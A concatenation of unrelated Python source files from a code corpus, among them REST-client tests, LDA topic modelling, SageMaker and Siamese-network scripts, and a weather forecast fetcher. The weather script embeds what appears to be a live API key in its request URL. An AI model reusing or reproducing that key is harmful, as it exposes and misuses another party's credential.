finally:\n rest_api.StopApi = rest_api_stop_api\n\n\ndef test_restclient_process_curl():\n \"\"\"Tests RESTClient._process_curl with PycURL\"\"\"\n # Skip if PycURL not available\n try:\n import pycurl\n except ImportError:\n pytest.skip('Pycurl module required')\n return\n\n # Check PycURL is enabled in accelerator API\n import apyfal.client.rest\n assert apyfal.client.rest._USE_PYCURL\n\n # Start testing\n from apyfal.client.rest import RESTClient\n from apyfal.exceptions import ClientRuntimeException\n\n # Mock some accelerators parts\n class DummyAccelerator(RESTClient):\n \"\"\"Dummy AcceleratorClient\"\"\"\n\n def __del__(self):\n \"\"\"Does nothing\"\"\"\n\n # Mock PycURL\n pycurl_curl = pycurl.Curl\n perform_raises = False\n api_response = ''\n\n class Curl:\n \"\"\"Fake cURL that don\"t communicate\"\"\"\n mock_write = None\n\n def __init__(self):\n self.curl = pycurl_curl()\n\n def perform(self):\n \"\"\"Don't communicated but write in buffer\"\"\"\n # Simulate exception\n if perform_raises:\n raise 
pycurl.error\n\n # Write api_response\n self.mock_write.write(api_response.encode())\n\n def setopt(self, *args):\n \"\"\"set cURL options and intercept WRITEDATA\"\"\"\n if args[0] == pycurl.WRITEDATA:\n self.mock_write = args[1]\n self.curl.setopt(*args)\n\n def close(self):\n \"\"\"Close curl\"\"\"\n self.curl.close()\n\n pycurl.Curl = Curl\n\n # Tests\n try:\n # Mock some variables\n dummy_parameters = 'dummy_accelerator_parameters'\n dummy_datafile = 'dummy_datafile'\n\n accelerator = DummyAccelerator('Dummy')\n accelerator._configuration_url = 'dummy_configuration'\n\n # Test if work as excepted\n expected_response = {'id': 'dummy_id', 'processed': 'dummy_processed'}\n api_response = json.dumps(expected_response)\n response_id, processed = accelerator._process_curl(\n dummy_parameters, dummy_datafile)\n assert response_id == expected_response['id']\n assert processed == expected_response['processed']\n\n # Test: Invalid response\n api_response = '{id: corrupted_data'\n with pytest.raises(ClientRuntimeException):\n accelerator._process_curl(\n dummy_parameters, dummy_datafile)\n\n # Test: No id in response\n api_response = '{}'\n with pytest.raises(ClientRuntimeException):\n accelerator._process_curl(\n dummy_parameters, dummy_datafile)\n\n # Test: Curl.perform raise Exception\n perform_raises = True\n with pytest.raises(ClientRuntimeException):\n accelerator._process_curl(\n dummy_parameters, dummy_datafile)\n\n # Restore PycURL\n finally:\n pycurl.Curl = pycurl_curl\n\n\ndef test_restclient_process_openapi():\n \"\"\"Tests RESTClient._process_openapi with OpenApi\"\"\"\n # Clean imported modules\n # to force to reimport without PycURL if present\n pycurl_module = sys.modules.get('pycurl')\n if pycurl_module is not None:\n sys.modules['pycurl'] = None\n for module in list(sys.modules):\n if module.startswith('apyfal.client.rest'):\n del sys.modules[module]\n gc.collect()\n\n # Check PycURL is disabled in accelerator API\n import apyfal.client.rest\n assert not apyfal.client.rest._USE_PYCURL\n\n # Starts testing with PycURL disabled\n try:\n from apyfal.client.rest import RESTClient\n import apyfal.client.rest._openapi as rest_api\n\n # Mock some variables\n dummy_id = 'dummy_id'\n dummy_processed = 'dummy_processed'\n dummy_parameters = 'dummy_accelerator_parameters'\n dummy_datafile = 'dummy_datafile'\n dummy_configuration = 'dummy_configuration'\n\n # Mocks OpenApi REST API ProcessApi\n class ProcessApi:\n \"\"\"Fake rest_api.ProcessApi\"\"\"\n\n def __init__(self, api_client):\n \"\"\"Store API client\"\"\"\n self.api_client = api_client\n\n @staticmethod\n def process_create(configuration, parameters, datafile):\n \"\"\"Checks input arguments and returns fake response\"\"\"\n assert parameters == dummy_parameters\n assert datafile == dummy_datafile\n assert configuration == dummy_configuration\n\n # Return fake response\n Response = collections.namedtuple('Response', ['processed', 'id'])\n return Response(id=dummy_id, processed=dummy_processed)\n\n # Mock some accelerators parts\n class DummyAccelerator(RESTClient):\n \"\"\"Dummy AcceleratorClient\"\"\"\n\n def __del__(self):\n \"\"\"Does nothing\"\"\"\n\n # Monkey patch OpenApi client with mocked API\n rest_api_process_api = rest_api.ProcessApi\n rest_api.ProcessApi = ProcessApi\n\n # Tests\n try:\n # Test if work as excepted\n accelerator = DummyAccelerator('Dummy')\n accelerator._configuration_url = dummy_configuration\n\n response_id, processed = accelerator._process_openapi(\n dummy_parameters, dummy_datafile)\n assert 
response_id == dummy_id\n assert processed == dummy_processed\n\n # Restore OpenApi API\n finally:\n rest_api.ProcessApi = rest_api_process_api\n\n # Restores PycURL\n finally:\n if pycurl_module is not None:\n sys.modules['pycurl'] = pycurl_module\n for module in list(sys.modules):\n if module.startswith('apyfal.client.rest'):\n del sys.modules[module]\n gc.collect()\n\n\ndef test_restclient_process(tmpdir):\n \"\"\"Tests RESTClient._process\"\"\"\n import apyfal.exceptions as exc\n import apyfal.client.rest._openapi as rest_api\n from apyfal.client.rest import RESTClient\n\n # Creates temporary output dir and file in\n tmp_dir = tmpdir.dirpath()\n file_in = tmp_dir.join('file_in.txt')\n dir_out = tmp_dir.join('subdir')\n file_out = dir_out.join('file_out.txt')\n\n # Mocks some variables\n processed = False\n in_error = True\n specific = {'result': '1'}\n parameters_result = {'app': {\n 'status': 0,\n 'msg': 'dummy_parameters_result',\n 'specific': specific}}\n datafile_result = {'app': {\n 'status': 0, 'msg': 'dummy_datafile_result'}}\n out_content = b'file out content'\n\n # Mocks OpenApi REST API ProcessApi\n class ProcessApi:\n \"\"\"Fake rest_api.ProcessApi\"\"\"\n\n def __init__(self, api_client):\n \"\"\"Store API client\"\"\"\n self.api_client = api_client\n\n @staticmethod\n def process_read(id_value):\n \"\"\"Checks input arguments and returns fake response\"\"\"\n Response = collections.namedtuple(\n 'Response', ['processed', 'inerror',\n 'parametersresult', 'datafileresult'])\n\n # Check parameters\n assert id_value == 'dummy_id'\n\n # Returns response\n return Response(\n processed=True, inerror=in_error,\n parametersresult=json.dumps(parameters_result),\n datafileresult=json.dumps(datafile_result))\n\n @staticmethod\n def process_delete(id_value):\n \"\"\"Checks input arguments\"\"\"\n # Check parameters\n assert id_value == 'dummy_id'\n\n # Mock some accelerators parts\n class DummyAccelerator(RESTClient):\n \"\"\"Dummy AcceleratorClient\"\"\"\n\n def _process_openapi(self, accelerator_parameters, datafile):\n \"\"\"Mocks process function (tested separately)\n\n Checks input arguments and returns fake response\"\"\"\n # Checks input parameters\n assert json.loads(accelerator_parameters) == self._process_parameters\n assert datafile == file_in\n\n # Returns fake result\n return 'dummy_id', processed\n\n _process_curl = _process_openapi\n\n def __del__(self):\n \"\"\"Does nothing\"\"\"\n\n # Mocks requests in utilities\n class DummySession(requests.Session):\n \"\"\"Fake requests.Session\"\"\"\n\n @staticmethod\n def get(datafile_result_arg, **_):\n \"\"\"Checks input arguments and returns fake response\"\"\"\n Response = collections.namedtuple('Response', ['raw'])\n\n # Checks input parameters\n assert json.loads(datafile_result_arg) == datafile_result\n\n # Returns fake response\n return Response(raw=io.BytesIO(out_content))\n\n # Monkey patch OpenApi client with mocked API\n openapi_client_process_api = rest_api.ProcessApi\n rest_api.ProcessApi = ProcessApi\n\n # Monkey patch requests in utilities\n requests_session = requests.Session\n requests.Session = DummySession\n\n # Tests\n try:\n # Test accelerator not configured\n accelerator = DummyAccelerator('Dummy')\n with pytest.raises(exc.ClientConfigurationException):\n accelerator.process()\n\n accelerator._configuration_url = 'dummy_configuration'\n\n # Test input file not exists\n with pytest.raises(exc.ClientConfigurationException):\n accelerator.process(str(file_in), str(file_out))\n\n # Creates input file\n 
file_in.write('file in content')\n assert file_in.check(file=True)\n\n # Test result \"inerror\" and output-dir creation\n assert not dir_out.check(dir=True)\n\n with pytest.raises(exc.ClientRuntimeException):\n accelerator.process(str(file_in), str(file_out))\n\n assert dir_out.check(dir=True)\n\n # Sets to not in error\n in_error = False\n\n # Check if working as excepted\n expected_parameters_result = copy.deepcopy(parameters_result)\n del expected_parameters_result['app']['specific']\n assert accelerator.process(\n str(file_in), str(file_out), info_dict=True) == (\n specific, expected_parameters_result)\n assert file_out.read_binary() == out_content\n\n # Checks without info_dict\n assert accelerator.process(str(file_in), str(file_out)) == specific\n\n # Checks without result\n del parameters_result['app']['specific']\n assert accelerator.process(str(file_in), str(file_out)) == dict()\n\n # Restore requests and OpenApi API\n finally:\n requests.Session = requests_session\n rest_api.ProcessApi = openapi_client_process_api\n","sub_path":"tests/test_client_rest.py","file_name":"test_client_rest.py","file_ext":"py","file_size_in_byte":21888,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"89255423","text":"from sklearn.feature_extraction.text import CountVectorizer\nfrom sklearn.decomposition import LatentDirichletAllocation\nfrom spacy.lang.en.lemmatizer.lookup import LOOKUP\nfrom sklearn.externals import joblib\nimport pandas as pd\nimport numpy as np\nimport sys\nimport re\n\nif len(sys.argv) < 2:\n print(\"Usage:\",sys.argv[0],\"\")\n sys.exit(1)\nelif len(sys.argv) == 2:\n n_components = [int(sys.argv[1])]\nelse:\n n_components = list([int(sys.argv[i]) for i in range(1,len(sys.argv))])\n\nfname = \"../data/tesi_US/US_PhD_dissertations.xlsx\"\nn_features = [6000]\n\ndef get_top_n_words(corpus, n=None):\n vec = CountVectorizer().fit(corpus)\n bag_of_words = vec.transform(corpus)\n sum_words = bag_of_words.sum(axis=0)\n words_freq = [(word, sum_words[0, idx]) for word, idx in vec.vocabulary_.items()]\n words_freq = sorted(words_freq, key = lambda x: x[1], reverse=True)\n return words_freq[:n]\n\ndef feed_data(input_data):\n for index,row in input_data.iterrows():\n yield row[' Abstract ']\n\nprint(\"Reading data...\")\nabstracts = pd.read_excel(fname, usecols=[24])\n\nprint(\"Preprocessing data...\")\nabstracts = abstracts[abstracts[' Abstract '] != \" Nessun elemento disponibile. \"]\nabstracts = abstracts[abstracts[' Abstract '] != \" Abstract Not Available. \"]\nabstracts = abstracts[abstracts[' Abstract '] != \" Abstract not available. 
\"]\nabstracts = abstracts[abstracts[' Abstract '] != \" Abstract Not Available \"]\nabstracts = abstracts[abstracts[' Abstract '] != \"Abstract not available.\"]\n\ncv = CountVectorizer(stop_words=\"english\", analyzer=\"word\", max_df=0.7)\nanalyzer = cv.build_analyzer()\n\n#stopwords/punctuation removal + lowercase + tokenization\nabstracts = abstracts.applymap(lambda x: \" \".join(s for s in analyzer(x)))\n#lemmatization via spaCy's lookup table (not true stemming)\nabstracts = abstracts.applymap(lambda x: \" \".join(LOOKUP[s] for s in x.split() if s in LOOKUP))\n\nfor n_words in n_features:\n print(\"Selecting most frequent\",n_words ,\"words...\")\n top_freqs = get_top_n_words(abstracts[' Abstract '], n_words)\n words = list([word for word,freq in top_freqs])\n\n print(\" Computing term-document matrix...\")\n TDmatrix = cv.fit(words)\n TDmatrix = cv.transform(feed_data(abstracts))\n\n for num in n_components:\n print(\" starting LDA with\",num,\"topics...\")\n lda = LatentDirichletAllocation(n_components=num,\n max_iter=15,\n learning_method='online',\n learning_offset=30.,\n random_state=0,\n n_jobs=-1)\n\n lda.fit(TDmatrix)\n joblib.dump(lda, \"LDA_s_\"+str(num)+\"_\"+str(n_words)[:-3]+\"k.pkl\")\n","sub_path":"analysis/train_LDA_stemming.py","file_name":"train_LDA_stemming.py","file_ext":"py","file_size_in_byte":2756,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"}
{"seq_id":"169686532","text":"from strategy_1 import Strategy_1\nfrom data import Data\nfrom candle import Candle\nfrom type import TimeRange\nimport datetime\n\n\nclass StrategyInit:\n \"\"\"Strategy initialization class\n\n The class initializes the strategy, gathers the data the strategy requires,\n creates the strategy object and sets the strategy running\n \"\"\"\n\n def __init__(self, strategy: Strategy_1):\n \"\"\"Constructor of the strategy initialization class\n\n Args:\n strategy: The strategy\n \"\"\"\n\n self.strategy = strategy\n\n def getNeed(self):\n \"\"\"Gather the data the strategy requires\n\n \"\"\"\n\n self.strategyNeed = self.strategy.setNeed()\n if (self.strategyNeed.candleCount != None):\n pass # Select the range, create and fill the candles\n\n if (self.strategyNeed.dataTimeRange != None):\n print(\"STRATEGY NEEDS DATA FOR \" + str(self.strategyNeed.dataTimeRange) + \"MINUTES\")\n self.timeRange = TimeRange()\n print(\"Set begin time: \\n\")\n self.timeRange.beginTime = datetime.datetime(int(input(\"year: \")), int(input(\"month: \")),\n int(input(\"day: \")),\n int(input(\"hour: \")), int(input(\"minute: \"), 0))\n print(\"Set end time: \\n\")\n self.timeRange.endTime = datetime.datetime(int(input(\"year: \")), int(input(\"month: \")),\n int(input(\"day: \")),\n int(input(\"hour: \")), int(input(\"minute: \"), 0))\n self.data = Data(self.timeRange)\n self.strategy.setPastData(self.data)\n\n def start(self):\n \"\"\"Start the strategy\n\n \"\"\"\n\n self.strategy.getDecision()\n\n # From here on, either an infinite loop or something else\n\n\nif __name__ == \"__main__\":\n strat = Strategy_1()\n A = StrategyInit(strat)\n A.getNeed()\n A.start()\n","sub_path":"src/strategyInit.py","file_name":"strategyInit.py","file_ext":"py","file_size_in_byte":2320,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"}
{"seq_id":"427359192","text":"#!/usr/bin/env python3\n\n\"\"\"\n#!//bin/ksh\n\n# Shell Implementation\n\nDate=$(/bin/date +%d-%b-%Y)\n\nif [[ $1 != \"\" ]]; then\n cp -p $1 ${1}.${Date}.$$\nfi\n\"\"\"\n\n\nclass BDate:\n\n @staticmethod\n def date_pattern():\n \"\"\"\n 
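
# The fit loop above, reduced to its core: vectorize, fit an online LDA, and
# read the topics back off components_. A self-contained sketch with toy
# documents (get_feature_names_out assumes scikit-learn >= 1.0; older
# versions spell it get_feature_names):
from sklearn.feature_extraction.text import CountVectorizer
from sklearn.decomposition import LatentDirichletAllocation

docs = ["neural networks learn representations",
        "markets price risk and returns",
        "deep networks need training data"]
vec = CountVectorizer(stop_words='english')
td = vec.fit_transform(docs)
lda = LatentDirichletAllocation(n_components=2, random_state=0).fit(td)

terms = vec.get_feature_names_out()
for k, topic in enumerate(lda.components_):
    print('topic', k, [terms[i] for i in topic.argsort()[-3:]])
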
Return a date pattern\n :return: Day_MonthName_Year_HourMinSecMicrosecond\n \"\"\"\n\n from datetime import datetime\n\n # Current time\n now = datetime.now()\n # Getting date\n date_val = now.strftime('%d_%b_%Y')\n # Getting hour:min:sec\n hour_val = now.strftime('%H%M%S')\n # Getting microsecond\n micro_val = now.strftime('%f')[:2]\n\n # Returns a str in described format\n return f'{date_val}_{hour_val}{micro_val}'\n\n @staticmethod\n def copy_file(file_name, new_file_name):\n \"\"\"\n Copy one file to another\n :param file_name: file to be copied\n :param new_file_name: saved name copied file\n :return: None\n \"\"\"\n\n import os\n\n if not os.path.exists(file_name):\n raise FileNotFoundError\n\n with open(str(file_name), 'rb') as infile:\n with open(str(new_file_name), 'wb') as outfile:\n while True:\n buff = infile.read(10240)\n if buff:\n outfile.write(buff)\n else:\n break\n\n return\n\n\ndef create_backup_file(*args):\n \"\"\"\n Takes the list of filenames and rename with date pattern in the end\n :param args: argument of file names\n :return: renames the file name[s] passed with added date_pattern\n \"\"\"\n\n for file in list(*args):\n try:\n date_pattern = BDate.date_pattern()\n BDate.copy_file(file, f'{file}.{date_pattern}')\n except FileNotFoundError as err:\n print(f'[ERROR] {err.filename} : No such file or directory')\n\n\nif __name__ == '__main__':\n \"\"\"\n Takes the name/names of the file to rename with date_pattern\n :param None\n :return None\n \"\"\"\n\n import sys\n\n if len(sys.argv) == 1:\n print(\"\"\"Usage: bdate file_name\"\"\")\n exit(-1)\n\n # Removing script name from the list\n del sys.argv[0]\n\n # Calling the Main Command for creating filename with pattern\n create_backup_file(sys.argv)\n","sub_path":"bdate.py","file_name":"bdate.py","file_ext":"py","file_size_in_byte":2311,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"208845579","text":"import json\nimport requests\nimport csv\ndef meteo(city):\n api_key = \"b8bdb7d52b20aa7c239f409d7f009840\"\n # requete post\n url = \"https://api.openweathermap.org/data/2.5/forecast?lang=fr&q=%s&appid=%s\" % (city, api_key)\n x = requests.get(url)\n try:\n x = json.loads(x.text)\n x = x['list']\n i = 0\n tab=\"\"\n while(i<40):\n y = x[i]\n main = y['main']\n date = y['dt_txt']\n temp = main['temp'] - 273.15\n temp = round(temp)\n temp_min = main['temp_min'] - 273.15\n temp_min = round(temp_min)\n temp_max = main['temp_max'] - 273.15\n temp_max = round(temp_max)\n tab= tab+\"Ville: %s \\ntemperature : %s c\\ntemperature min : %s c\\ntemperature max : %s c\\ndate : %s \\n\" % (\n city, temp, temp_min, temp_max,date)\n i = i + 1\n fichier = open(\"data.txt\", \"w+\")\n fichier.write(tab)\n fichier.close()\n except:\n yolo = input('entre une nouvelle ville avec le bon nom cette fois ...')\n meteo(yolo)\nyolo= input(\"Entrez la ville \")\nmeteo(yolo)","sub_path":"Python/exo1.py","file_name":"exo1.py","file_ext":"py","file_size_in_byte":1131,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"45500520","text":"import boto3\r\nfrom datetime import datetime, timedelta\r\nimport re\r\n\r\nclient = boto3.client('sagemaker')\r\nrunning_jobs = client.list_training_jobs(CreationTimeAfter=datetime.utcnow() - timedelta(hours=1))\r\n\r\nlogdir = None\r\nfor job in running_jobs['TrainingJobSummaries']:\r\n tensorboard_job = False\r\n name = None\r\n tags = client.list_tags(ResourceArn=job['TrainingJobArn'])\r\n for tag in 
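
# copy_file() above is a hand-rolled 10 KiB chunked copy; the stdlib
# equivalent is shutil.copyfileobj, which runs the same buffered loop. A
# runnable comparison (this sketch creates its own throwaway input file):
import shutil

with open('in.bin', 'wb') as f:
    f.write(b'\x00' * 30000)
with open('in.bin', 'rb') as src, open('out.bin', 'wb') as dst:
    shutil.copyfileobj(src, dst, length=10240)  # 10 KiB chunks, like the loop above
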
tags['Tags']:\r\n if tag['Key'] == 'TensorBoard':\r\n name = tag['Value']\r\n if tag['Key'] == 'Project' and tag['Value'] == 'cifar10':\r\n desc = client.describe_training_job(TrainingJobName=job['TrainingJobName'])\r\n job_name = desc['HyperParameters']['sagemaker_job_name'].replace('\"', '')\r\n tensorboard_dir = re.sub(\r\n 'source/sourcedir.tar.gz', 'model', desc['HyperParameters']['sagemaker_submit_directory']\r\n )\r\n tensorboard_job = True\r\n\r\n if tensorboard_job:\r\n if name is None:\r\n name = job['TrainingJobName']\r\n\r\n if logdir is None:\r\n logdir = '{}:{}'.format(name, tensorboard_dir)\r\n else:\r\n logdir = '{},{}:{}'.format(logdir, name, tensorboard_dir)\r\n\r\nif logdir:\r\n print('AWS_REGION={} tensorboard --logdir {}'.format(boto3.session.Session().region_name, logdir))\r\nelse:\r\n print('No jobs are in progress')","sub_path":"Generación del tensor board.py","file_name":"Generación del tensor board.py","file_ext":"py","file_size_in_byte":1359,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"189473361","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Fri Apr 16 14:39:55 2021\r\n\r\n@author: Aditya\r\n\"\"\"\r\n\r\n\r\nimport numpy as np\r\n##from numpy import asarray\r\nimport os \r\nimport glob\r\n##import secrets\r\nfrom tensorflow.keras.models import Model\r\nfrom tensorflow.keras.layers import Input\r\nfrom tensorflow.keras.layers import Conv2D\r\nfrom tensorflow.keras.layers import Dense\r\nfrom tensorflow.keras.layers import Dropout\r\nfrom tensorflow.keras.layers import MaxPooling2D\r\nfrom tensorflow.keras.layers import Lambda\r\nfrom tensorflow.keras.layers import Flatten\r\n# from keras.layers import Dense, Conv2D, Input, MaxPool2D, Flatten, merge\r\nimport tensorflow.keras.backend as K\r\nimport cv2\r\nfrom keras.regularizers import l2\r\nfrom keras.optimizers import Adam, RMSprop\r\nimport pandas as pd\r\nfrom keras.models import Sequential\r\nfrom keras.layers import Conv2D, ZeroPadding2D, Activation, Input, concatenate, Dropout\r\nfrom keras.models import Model\r\n\r\nfrom keras.layers.normalization import BatchNormalization\r\n\r\nfrom keras.callbacks import EarlyStopping, ModelCheckpoint, ReduceLROnPlateau\r\n\r\n\r\nbase = '/content/drive/MyDrive/main'\r\n\r\nclasses = os.listdir(base)\r\n\r\n##images = glob.glob(base, '*.png')\r\n\r\nimages = glob.glob('/content/drive/MyDrive/main/**/*.png', \r\n recursive = True) \r\n\r\nprint('images')\r\nprint(len(images))\r\n\r\n##real = os.listdir(base_real)\r\n##forged = os.listdir(base_forged)\r\n\r\nreal_images = []\r\nforged_images = []\r\nimg_h, img_w = 150, 200\r\nlabels = []\r\nimg_shape = 28\r\nreal_list = np.empty(shape=(2,5), dtype= object) \r\nforged_list = np.empty(shape=(2,5), dtype=object)\r\n# pairs = []\r\nimg_shape = (28, 28,1)\r\n \r\n##targets = []\r\n \r\n\r\n\r\ndef build_siamese_model(input_shape):\r\n \r\n model = Sequential()\r\n \r\n model.add(Conv2D(96, kernel_size=(11, 11), activation='relu', name='conv1_1', strides=4, input_shape= input_shape, \r\n kernel_initializer='glorot_uniform'))\r\n model.add(BatchNormalization(epsilon=1e-06, axis=1, momentum=0.9))\r\n model.add(MaxPooling2D((3,3), strides=(2, 2))) \r\n model.add(ZeroPadding2D((2, 2)))\r\n \r\n model.add(Conv2D(256, kernel_size=(5, 5), activation='relu', name='conv2_1', strides=1, kernel_initializer='glorot_uniform'))\r\n model.add(BatchNormalization(epsilon=1e-06, axis=1, momentum=0.9))\r\n model.add(MaxPooling2D((3,3), strides=(2, 2)))\r\n 
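
# The loop above assembles TensorBoard's multi-run --logdir syntax,
# "name1:dir1,name2:dir2". The string building in isolation (the run names
# and S3 paths here are hypothetical):
runs = [('job-a', 's3://bucket/job-a/model'), ('job-b', 's3://bucket/job-b/model')]
logdir = ','.join('{}:{}'.format(name, path) for name, path in runs)
print('tensorboard --logdir ' + logdir)
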
model.add(Dropout(0.3))# added extra\r\n model.add(ZeroPadding2D((1, 1)))\r\n \r\n model.add(Conv2D(384, kernel_size=(3, 3), activation='relu', name='conv3_1', strides=1, kernel_initializer='glorot_uniform'))\r\n model.add(ZeroPadding2D((1, 1)))\r\n \r\n model.add(Conv2D(256, kernel_size=(3, 3), activation='relu', name='conv3_2', strides=1, kernel_initializer='glorot_uniform')) \r\n model.add(MaxPooling2D((3,3), strides=(2, 2)))\r\n model.add(Dropout(0.3))# added extra\r\n model.add(Flatten(name='flatten'))\r\n model.add(Dense(1024, kernel_regularizer=l2(0.0005), activation='relu', kernel_initializer='glorot_uniform'))\r\n model.add(Dropout(0.5))\r\n \r\n model.add(Dense(128, kernel_regularizer=l2(0.0005), activation='relu', kernel_initializer='glorot_uniform')) # softmax changed to relu\r\n \r\n return model\r\n\r\ndef euclidean_distance(vectors):\r\n\t# unpack the vectors into separate lists\r\n\tfeatsA, featsB = vectors\r\n\t# compute the sum of squared distances between the vectors\r\n\treturn K.sqrt(K.sum(K.square(featsA - featsB), axis=1, keepdims=True))\r\n\r\n\r\ndef euclidean_distance_output_shape(shapes):\r\n shape1, shape2 = shapes\r\n return (shape1[0], 1)\r\n\r\ndef contrastive_loss(y_true, y_pred):\r\n\r\n margin = 1\r\n\r\n loss = K.mean(y_true * K.square(y_pred) + (1 - y_true) * K.square(K.maximum(margin - y_pred, 0)))\r\n\r\n return loss\r\n\r\n\r\n\r\n\r\n\r\ndef image_read(path):\r\n image = cv2.imread(path, 0)\r\n image = cv2.resize(image, (img_w, img_h))\r\n image = np.array(image, dtype= np.float64)\r\n image /= 255\r\n image = image.reshape(img_h, img_w, 1)\r\n\r\n return image\r\n\r\n\r\ntraining_dir = '/content/drive/MyDrive/sign_data/train'\r\ntraining_csv = '/content/drive/MyDrive/sign_data/train_data.csv'\r\ntest_csv = '/content/drive/MyDrive/sign_data/test_data.csv'\r\ntest_dir = '/content/drive/MyDrive/sign_data/test'\r\n\r\ndef siamese_datagen(training_dir, training_csv, batch_size = 16):\r\n while True:\r\n targets = np.zeros((batch_size,))\r\n training_df = pd.read_csv(training_csv)\r\n pairs = [np.zeros((batch_size, img_h, img_w, 1)) for i in range(2)]\r\n p = 0\r\n for i in range(0, len(training_df)):\r\n image1_path = os.path.join(training_dir, training_df.iat[i, 0])\r\n image2_path = os.path.join(training_dir, training_df.iat[i, 1])\r\n\r\n img1 = image_read(image1_path)\r\n img2 = image_read(image2_path)\r\n\r\n pairs[0][p,:,:,:] = img1\r\n pairs[1][p,:,:,:] = img2\r\n\r\n targets[p] = training_df.iat[i, 2]\r\n\r\n p += 1\r\n\r\n if p == batch_size:\r\n yield pairs, targets\r\n p = 0\r\n pairs = [np.zeros((batch_size, img_h, img_w, 1)) for i in range(2)]\r\n targets = np.zeros((batch_size,))\r\n \r\n \r\n \r\n\r\n\r\n \r\n\r\n# training_data = siamese_datagen(real_images, forged_images, batch_size= 2) \r\n\r\nimage_shape = (img_h, img_w, 1)\r\n\r\nfeatureExtractor = build_siamese_model(image_shape)\r\nimgA = Input(shape = (image_shape))\r\nimgB = Input(shape = (image_shape))\r\nfeatsA = featureExtractor(imgA)\r\nfeatsB = featureExtractor(imgB)\r\n\r\ndistance = Lambda(euclidean_distance, output_shape = euclidean_distance_output_shape)([featsA, featsB])\r\n\r\nmodel = Model(inputs=[imgA, imgB], outputs=distance) \r\n\r\nbatch_sz = 128\r\ntraining_samples = 23206\r\nvalidation_samples = 5748\r\n\r\nrms = RMSprop(lr=0.01, rho=0.9, epsilon=1e-08)\r\nmodel.compile(loss=contrastive_loss, optimizer=rms)\r\n\r\n\r\ncallbacks = [\r\n ReduceLROnPlateau(factor=0.1, patience=5, min_lr=0.000001, verbose=1),\r\n ModelCheckpoint('/content/siamese_network.h5', 
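
# contrastive_loss above is the classic Hadsell et al. formula:
# mean(y * d^2 + (1 - y) * max(margin - d, 0)^2). A NumPy check of the same
# arithmetic with margin = 1 (whether label 1 means "genuine pair" depends on
# the conventions of the train/test CSVs, which this sketch does not assume):
import numpy as np

def contrastive_loss_np(y_true, dist, margin=1.0):
    return np.mean(y_true * dist ** 2 +
                   (1 - y_true) * np.maximum(margin - dist, 0) ** 2)

print(contrastive_loss_np(np.array([1.0]), np.array([0.9])))  # 0.81: far "same" pair
print(contrastive_loss_np(np.array([0.0]), np.array([0.2])))  # 0.64: close "different" pair
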
verbose=1, save_weights_only=True)\r\n]\r\n\r\n\r\n\r\n# train the model\r\nprint(\"[INFO] training model...\")\r\nhistory = model.fit_generator(siamese_datagen(training_dir, training_csv, batch_sz),\r\n \t validation_data= siamese_datagen(test_dir, test_csv, batch_sz),\r\n epochs=50,\r\n steps_per_epoch = training_samples//batch_sz,\r\n validation_steps = validation_samples // batch_sz,\r\n callbacks = callbacks)\r\n\r\n","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":6264,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"436723011","text":"\"\"\"\nThis module contains user interface related code, such as the\nmain screen and diagram windows.\n\"\"\"\n\nfrom gi.repository import Gtk, Gdk\nimport pkg_resources\nimport os.path\n\nicon_theme = Gtk.IconTheme.get_default()\nicon_theme.append_search_path(\n os.path.abspath(pkg_resources.resource_filename(\"gaphor.ui\", \"pixmaps\"))\n)\n\nimport re\n\n\ndef _repl(m):\n v = m.group(1).lower()\n return len(v) == 1 and v or \"%c-%c\" % tuple(v)\n\n\n_repl.expr = \"(.?[A-Z])\"\n\n\ndef icon_for_element(element):\n return re.sub(_repl.expr, _repl, type(element).__name__)\n\n\n# Set style for model canvas\ncss_provider = Gtk.CssProvider.new()\nscreen = Gdk.Display.get_default().get_default_screen()\n\nGtk.StyleContext.add_provider_for_screen(\n screen, css_provider, Gtk.STYLE_PROVIDER_PRIORITY_APPLICATION\n)\ncss_provider.load_from_data(\"#diagram-tab { background: white }\".encode(\"utf-8\"))\n","sub_path":"gaphor/ui/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":870,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"412188648","text":"__author__ = 'haibin'\n\nfrom setuptools import setup\n\nsetup(\n name='pycayley',\n version='0.4.2',\n author='zhao haibin',\n author_email='zhaohaibin@outlook.com',\n packages=['pycayley'],\n url='https://github.com/haibinpark/pycayley',\n license='LICENSE',\n description='Python client for an open-source graph database Cayley',\n install_requires=['requests', 'rdflib', 'pyld'],\n include_package_data=True\n)\n","sub_path":"pypi_install_script/pycayley-0.4.2.tar/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":430,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"229225069","text":"import subprocess, time\n\n\ndef runNebula(threadName, lineCallback, executable, config):\n\n shell = True\n\n count = 0\n popen = subprocess.Popen([executable, \"--config\", config], shell=shell, stdout=subprocess.PIPE)\n for line in iter(popen.stdout.readline, ''):\n lineCallback(line)\n popen.wait()","sub_path":"nebula.py","file_name":"nebula.py","file_ext":"py","file_size_in_byte":316,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"481267032","text":"########\n# Copyright (c) 2014 GigaSpaces Technologies Ltd. 
